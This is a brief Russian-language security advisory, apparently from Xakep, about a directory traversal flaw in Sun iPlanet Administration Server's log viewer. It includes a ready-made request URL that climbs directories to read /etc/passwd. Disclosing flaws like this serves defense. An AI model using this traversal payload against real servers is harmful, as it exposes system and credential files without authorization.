Directory Traversal в Sun iPlanet Administration Server

Рекомендуем почитать:

Xakep #299. Sysmon

Содержание выпуска
Подписка на «Хакер»-60%

В Sun iPlanet Administration Server, в модуле просмотра
логов, обнаружена возможность обхода
каталога и просмотра произвольных файлов
на системе.

Пример:

http://192.168.192.168:5000/ admin-serv/tasks/configuration/ ViewLog?file=pa
sswd&num=5000 &str=&directories=admin-serv%2Flogs%2f..
%2f..%2f..%2f..%2f..%2f..%2fetc&id=a dmin-serv

Directory Traversal в Sun iPlanet Administration Server

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Как работает EDR. Подробно разбираем механизмы антивирусной защиты

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Исследователи нашли сайт, торгующий миллиардами сообщений из Discord

Майнеры используют уязвимости в OpenMetadata и оставляют жертвам записки

Microsoft случайно добавила Copilot в Windows Server

GPT-4 может эксплуатировать уязвимости, изучив связанные бюллетени безопасности

Cisco патчит уязвимость повышения привилегий в IMC